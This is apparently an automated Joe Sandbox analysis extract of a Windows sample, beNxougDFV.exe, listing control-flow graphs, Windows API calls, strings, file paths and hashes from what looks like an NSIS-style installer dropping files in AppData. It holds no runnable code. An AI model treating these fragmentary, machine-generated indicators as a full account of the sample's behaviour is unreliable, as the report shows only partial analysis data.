                                        control_flow_graph 656 402f81-402f95 657 402f97 656->657 658 402f9e-402fa6 656->658 657->658 659 402fa8 658->659 660 402fad-402fb2 658->660 659->660 661 402fc2-402fcf call 40315d 660->661 662 402fb4-402fbd call 403173 660->662 666 403114 661->666 667 402fd5-402fd9 661->667 662->661 670 403116-403117 666->670 668 4030fd-4030ff 667->668 669 402fdf-402fff GetTickCount call 4063ec 667->669 672 403101-403104 668->672 673 403148-40314c 668->673 682 403153 669->682 684 403005-40300d 669->684 671 403156-40315a 670->671 675 403106 672->675 676 403109-403112 call 40315d 672->676 677 403119-40311f 673->677 678 40314e 673->678 675->676 676->666 690 403150 676->690 680 403121 677->680 681 403124-403132 call 40315d 677->681 678->682 680->681 681->666 693 403134-403140 call 405b6f 681->693 682->671 687 403012-403020 call 40315d 684->687 688 40300f 684->688 687->666 694 403026-40302f 687->694 688->687 690->682 699 403142-403145 693->699 700 4030f9-4030fb 693->700 696 403035-403052 call 40640c 694->696 702 4030f5-4030f7 696->702 703 403058-40306f GetTickCount 696->703 699->673 700->670 702->670 704 403071-403079 703->704 705 4030b4-4030b6 703->705 706 403081-4030ac MulDiv wsprintfA call 405056 704->706 707 40307b-40307f 704->707 708 4030b8-4030bc 705->708 709 4030e9-4030ed 705->709 715 4030b1 706->715 707->705 707->706 712 4030d1-4030d7 708->712 713 4030be-4030c3 call 405b6f 708->713 709->684 710 4030f3 709->710 710->682 714 4030dd-4030e1 712->714 718 4030c8-4030ca 713->718 714->696 717 4030e7 714->717 715->705 717->682 718->700 719 4030cc-4030cf 718->719 719->714
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1390012497.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1389993034.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390064349.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390083947.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390083947.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390083947.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390083947.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390083947.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390185529.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_beNxougDFV.jbxd
                                        Similarity
                                        • API ID: CountTick$wsprintf
                                        • String ID: ... %d%%
                                        • API String ID: 551687249-2449383134
                                        • Opcode ID: 167b5ca0bfb3e57695ff9e62e4c69d0835ce9269e9eafab78b1523a358312806
                                        • Instruction ID: 60d675f18a734e15d0b5dd350d1cecbd4da5e6a0cde0341d3a53a3cb480860e8
                                        • Opcode Fuzzy Hash: 167b5ca0bfb3e57695ff9e62e4c69d0835ce9269e9eafab78b1523a358312806
                                        • Instruction Fuzzy Hash: FA519F71901219DBCB10EF65D9046AF7BB8AB04756F14413BF811B72C1C7789E51CBAA

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 720 405af7-405b01 721 405b02-405b2d GetTickCount GetTempFileNameA 720->721 722 405b3c-405b3e 721->722 723 405b2f-405b31 721->723 724 405b36-405b39 722->724 723->721 725 405b33 723->725 725->724
                                        APIs
                                        • GetTickCount.KERNEL32 ref: 00405B0B
                                        • GetTempFileNameA.KERNELBASE(?,?,00000000,?,?,00000006,00000008,0000000A), ref: 00405B25
                                        Strings
                                        • nsa, xrefs: 00405B02
                                        • C:\Users\user\AppData\Local\Temp\, xrefs: 00405AFA
                                        • "C:\Users\user\Desktop\beNxougDFV.exe", xrefs: 00405AF7
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1390012497.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1389993034.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390064349.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390083947.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390083947.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390083947.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390083947.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390083947.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390185529.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_beNxougDFV.jbxd
                                        Similarity
                                        • API ID: CountFileNameTempTick
                                        • String ID: "C:\Users\user\Desktop\beNxougDFV.exe"$C:\Users\user\AppData\Local\Temp\$nsa
                                        • API String ID: 1716503409-2487253352
                                        • Opcode ID: 4f71c4811bd2189c67125445424a5cfd250d6f6759894b34be1bee502b12972b
                                        • Instruction ID: d7521d4eade0cbd7120b41c29d2b11454b957a1e542ceee7a25420a70a1b98fd
                                        • Opcode Fuzzy Hash: 4f71c4811bd2189c67125445424a5cfd250d6f6759894b34be1bee502b12972b
                                        • Instruction Fuzzy Hash: CFF082367082047BDB108F56DC04B9B7FA8DF91750F10803BFA08AA291D6B4B9558B69

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 726 401ffd-402009 727 4020c4-4020c6 726->727 728 40200f-402025 call 402ac1 * 2 726->728 729 402237-40223c call 401423 727->729 738 402034-402042 LoadLibraryExA 728->738 739 402027-402032 GetModuleHandleA 728->739 736 402951-402960 729->736 737 402716-40271d 729->737 737->736 741 402044-402051 GetProcAddress 738->741 742 4020bd-4020bf 738->742 739->738 739->741 744 402090-402095 call 405056 741->744 745 402053-402059 741->745 742->729 749 40209a-40209d 744->749 747 402072-402086 745->747 748 40205b-402067 call 401423 745->748 753 40208b-40208e 747->753 748->749 758 402069-402070 748->758 749->736 751 4020a3-4020ab call 40371f 749->751 751->736 757 4020b1-4020b8 FreeLibrary 751->757 753->749 757->736 758->749
                                        APIs
                                        • GetModuleHandleA.KERNELBASE(00000000,00000001,000000F0), ref: 00402028
                                          • Part of subcall function 00405056: lstrlenA.KERNEL32(Completed,00000000,0040E8C0,00000000,?,?,?,?,?,?,?,?,?,004030B1,00000000,?), ref: 0040508F
                                          • Part of subcall function 00405056: lstrlenA.KERNEL32(004030B1,Completed,00000000,0040E8C0,00000000,?,?,?,?,?,?,?,?,?,004030B1,00000000), ref: 0040509F
                                          • Part of subcall function 00405056: lstrcatA.KERNEL32(Completed,004030B1,004030B1,Completed,00000000,0040E8C0,00000000), ref: 004050B2
                                          • Part of subcall function 00405056: SetWindowTextA.USER32(Completed,Completed), ref: 004050C4
                                          • Part of subcall function 00405056: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 004050EA
                                          • Part of subcall function 00405056: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00405104
                                          • Part of subcall function 00405056: SendMessageA.USER32(?,00001013,?,00000000), ref: 00405112
                                        • LoadLibraryExA.KERNELBASE(00000000,?,00000008,00000001,000000F0), ref: 00402038
                                        • GetProcAddress.KERNEL32(00000000,?), ref: 00402048
                                        • FreeLibrary.KERNELBASE(00000000,00000000,000000F7,?,?,00000008,00000001,000000F0), ref: 004020B2
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1390012497.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1389993034.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390064349.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390083947.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390083947.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390083947.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390083947.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390083947.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390185529.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_beNxougDFV.jbxd
                                        Similarity
                                        • API ID: MessageSend$Librarylstrlen$AddressFreeHandleLoadModuleProcTextWindowlstrcat
                                        • String ID:
                                        • API String ID: 2987980305-0
                                        • Opcode ID: 3ec78819d622ed86bae178855df993612b78117d9056a0a9d79db71722311b1c
                                        • Instruction ID: 772c7401ca61f63a6a86f526de26f8a62e510dd82d200dd974b96084c7de1680
                                        • Opcode Fuzzy Hash: 3ec78819d622ed86bae178855df993612b78117d9056a0a9d79db71722311b1c
                                        • Instruction Fuzzy Hash: 7F21DB71B04225B7CF207FA48E49B6E7A70AB44358F20413BFB15B22D0D7BD8942D65E
                                        APIs
                                          • Part of subcall function 00405960: CharNextA.USER32(?,?,C:\Users\user\AppData\Local\Temp\nsw599B.tmp,?,004059CC,C:\Users\user\AppData\Local\Temp\nsw599B.tmp,C:\Users\user\AppData\Local\Temp\nsw599B.tmp,774D3410,?,C:\Users\user\AppData\Local\Temp\,00405717,?,774D3410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 0040596E
                                          • Part of subcall function 00405960: CharNextA.USER32(00000000), ref: 00405973
                                          • Part of subcall function 00405960: CharNextA.USER32(00000000), ref: 00405987
                                        • GetFileAttributesA.KERNELBASE(00000000,00000000,00000000,0000005C,00000000,000000F0), ref: 0040160D
                                          • Part of subcall function 0040551C: CreateDirectoryA.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\), ref: 0040555F
                                        • SetCurrentDirectoryA.KERNELBASE(00000000,C:\Users\user\AppData\Local\unshabbily,00000000,00000000,000000F0), ref: 0040163C
                                        Strings
                                        • C:\Users\user\AppData\Local\unshabbily, xrefs: 00401631
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1390012497.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1389993034.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390064349.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390083947.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390083947.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390083947.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390083947.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390083947.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390185529.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_beNxougDFV.jbxd
                                        Similarity
                                        • API ID: CharNext$Directory$AttributesCreateCurrentFile
                                        • String ID: C:\Users\user\AppData\Local\unshabbily
                                        • API String ID: 1892508949-4280797776
                                        • Opcode ID: c3dc61fa4864d68a63a0ff324977f2f4971824b7823c1438af4a242a8e85a59c
                                        • Instruction ID: a466de0d3f6f2377f24be2a4188d25ee0cffe6e715a209702fc6e54bc549958f
                                        • Opcode Fuzzy Hash: c3dc61fa4864d68a63a0ff324977f2f4971824b7823c1438af4a242a8e85a59c
                                        • Instruction Fuzzy Hash: 78112731608151EBCF217FB54C415BF2AB0DA96324B28053FE8D1B22E2D63D4D429A3F
                                        APIs
                                        • RegQueryValueExA.KERNELBASE(?,?,00000000,?,?,00000400,: Completed,?,?,?,?,00000002,: Completed,?,0040605A,80000002), ref: 00405E5C
                                        • RegCloseKey.KERNELBASE(?,?,0040605A,80000002,Software\Microsoft\Windows\CurrentVersion,: Completed,: Completed,: Completed,?,Completed), ref: 00405E67
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1390012497.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1389993034.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390064349.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390083947.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390083947.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390083947.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390083947.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390083947.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390185529.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_beNxougDFV.jbxd
                                        Similarity
                                        • API ID: CloseQueryValue
                                        • String ID: : Completed
                                        • API String ID: 3356406503-2954849223
                                        • Opcode ID: 3949dd6c93d052dc7270a5251cfef74d8147a6dfb4195bf0c528e32bcb56f74b
                                        • Instruction ID: 33be00f72f12327029ad1653fb2bc99e6b823e337a66ede3503504709cbc349d
                                        • Opcode Fuzzy Hash: 3949dd6c93d052dc7270a5251cfef74d8147a6dfb4195bf0c528e32bcb56f74b
                                        • Instruction Fuzzy Hash: 31015A72504209AEDF228F61CC09FEB3BA8EF55364F008426FE59A2190D778DA54CFA4
                                        APIs
                                        • CreateProcessA.KERNELBASE(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,00421510,Error launching installer), ref: 004055F7
                                        • CloseHandle.KERNEL32(?), ref: 00405604
                                        Strings
                                        • Error launching installer, xrefs: 004055E1
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1390012497.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1389993034.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390064349.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390083947.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390083947.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390083947.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390083947.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390083947.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390185529.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_beNxougDFV.jbxd
                                        Similarity
                                        • API ID: CloseCreateHandleProcess
                                        • String ID: Error launching installer
                                        • API String ID: 3712363035-66219284
                                        • Opcode ID: 0a67d81f0dbc2c48957f366610cafbe47269508c26dde6c53db592e432081f5d
                                        • Instruction ID: f1ce92c91028e46d95f0eda4fe37c0312dcd0371124bcb88e834d1219d8c4f53
                                        • Opcode Fuzzy Hash: 0a67d81f0dbc2c48957f366610cafbe47269508c26dde6c53db592e432081f5d
                                        • Instruction Fuzzy Hash: 5BE04FF0A00209BFEB009B60EC05F7B7ABCEB00748F404961BD11F31A0E374A9108A79
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1390012497.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1389993034.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390064349.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390083947.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390083947.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390083947.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390083947.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390083947.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390185529.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_beNxougDFV.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 55cd16da708e23aec6a838b73e901bfe03af6665630861bb5c569519520454bd
                                        • Instruction ID: c387c58543e41996c7b199f294dd4e3f2d8ae9e2c90db5b1f56269fb3149e58b
                                        • Opcode Fuzzy Hash: 55cd16da708e23aec6a838b73e901bfe03af6665630861bb5c569519520454bd
                                        • Instruction Fuzzy Hash: 32A14271E00229CBDF28CFA8C8587ADBBB1FF44305F15806AD856BB281D7785A96DF44
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1390012497.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1389993034.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390064349.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390083947.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390083947.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390083947.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390083947.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390083947.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390185529.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_beNxougDFV.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 320ecdc90cbab0b9bf19e530f323a115307d17d478260d9a41c0a63678b5b88a
                                        • Instruction ID: c0a55b7bb8cda596ca91e270a613f9aea3b485865d608933a43e484043593474
                                        • Opcode Fuzzy Hash: 320ecdc90cbab0b9bf19e530f323a115307d17d478260d9a41c0a63678b5b88a
                                        • Instruction Fuzzy Hash: 45913374D00229CBDF28CF98C8587ADBBB1FF44305F15812AD816BB291C7785996DF48
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1390012497.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1389993034.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390064349.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390083947.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390083947.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390083947.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390083947.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390083947.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390185529.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_beNxougDFV.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 4092221e86ab5222082a79c128cb789b468c9c6112b2c9e1203115320ceab273
                                        • Instruction ID: 33bdc002aa07cba8751fe1bb89261eb1bbd9089b315c8d097eab8488b12144ec
                                        • Opcode Fuzzy Hash: 4092221e86ab5222082a79c128cb789b468c9c6112b2c9e1203115320ceab273
                                        • Instruction Fuzzy Hash: 19814575D04228DFDF24CFA8C8847ADBBB1FB44305F25816AD816BB291C7389A96DF44
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1390012497.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1389993034.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390064349.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390083947.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390083947.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390083947.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390083947.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390083947.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390185529.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_beNxougDFV.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: a9b85a074dbd17559818524a47274955f7f908a271802c30195d609476ec7543
                                        • Instruction ID: 368e1e7272001cfb6f2dd5e39cf93d71f7d9f1f25059b380f60c2813f7b9aa4b
                                        • Opcode Fuzzy Hash: a9b85a074dbd17559818524a47274955f7f908a271802c30195d609476ec7543
                                        • Instruction Fuzzy Hash: 00818735D04228DBDF28CFA8C8447ADBBB1FB44305F21816AD856BB2C1D7785A96DF48
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1390012497.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1389993034.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390064349.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390083947.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390083947.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390083947.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390083947.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390083947.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390185529.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_beNxougDFV.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 05e0991df275fe04e69e24ab9d87d2bf1db0f1f681a575424d6ee50318c34d6b
                                        • Instruction ID: 563e9c7bfc12ab1e5735381274df4cd9413df1207b4ba467b436c4b8586dcceb
                                        • Opcode Fuzzy Hash: 05e0991df275fe04e69e24ab9d87d2bf1db0f1f681a575424d6ee50318c34d6b
                                        • Instruction Fuzzy Hash: C9713471D04228DFDF28CFA8C884BADBBB1FB44305F15806AD816B7291D7389996DF58
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1390012497.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1389993034.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390064349.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390083947.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390083947.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390083947.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390083947.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390083947.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390185529.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_beNxougDFV.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 51e8a78d7989ecdb0a9d35429efa0a8906fb135c8ca24dc2c1ed10a6651990fe
                                        • Instruction ID: 7154c5ac750784d404653f653373d782701dde13a8780768b6f209b569f9d9aa
                                        • Opcode Fuzzy Hash: 51e8a78d7989ecdb0a9d35429efa0a8906fb135c8ca24dc2c1ed10a6651990fe
                                        • Instruction Fuzzy Hash: 61714471D04228DBDF28CFA8C894BADBBB1FB44305F15806AD816BB291C7385996DF48
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1390012497.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1389993034.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390064349.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390083947.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390083947.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390083947.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390083947.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390083947.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390185529.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_beNxougDFV.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: c27dc6e5a0a86cb3c75e96e92f3c4bfdd7bca547c1c201786b56e13d92a68def
                                        • Instruction ID: 6d4e519aaefd354d35621c14bbf49efb9ee6a20a3da98f77445617ba41e869e3
                                        • Opcode Fuzzy Hash: c27dc6e5a0a86cb3c75e96e92f3c4bfdd7bca547c1c201786b56e13d92a68def
                                        • Instruction Fuzzy Hash: 64715771D04229DBEF28CF98C844BADBBB1FF44305F15806AD816B7291C7389996DF48
                                        APIs
                                        • GlobalFree.KERNEL32(00000000), ref: 00401BCC
                                        • GlobalAlloc.KERNELBASE(00000040,00000404), ref: 00401BDE
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1390012497.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1389993034.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390064349.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390083947.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390083947.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390083947.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390083947.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390083947.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390185529.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_beNxougDFV.jbxd
                                        Similarity
                                        • API ID: Global$AllocFree
                                        • String ID: 307
                                        • API String ID: 3394109436-3197571367
                                        • Opcode ID: d334b10cf0e6116476e410e6ad20a9aceabb79b78abcd267d4b567475e094b3c
                                        • Instruction ID: 8e70e66a58bbe0bbdc708fb34704032e6401d8afa79375c0cb6f9cb36bca9441
                                        • Opcode Fuzzy Hash: d334b10cf0e6116476e410e6ad20a9aceabb79b78abcd267d4b567475e094b3c
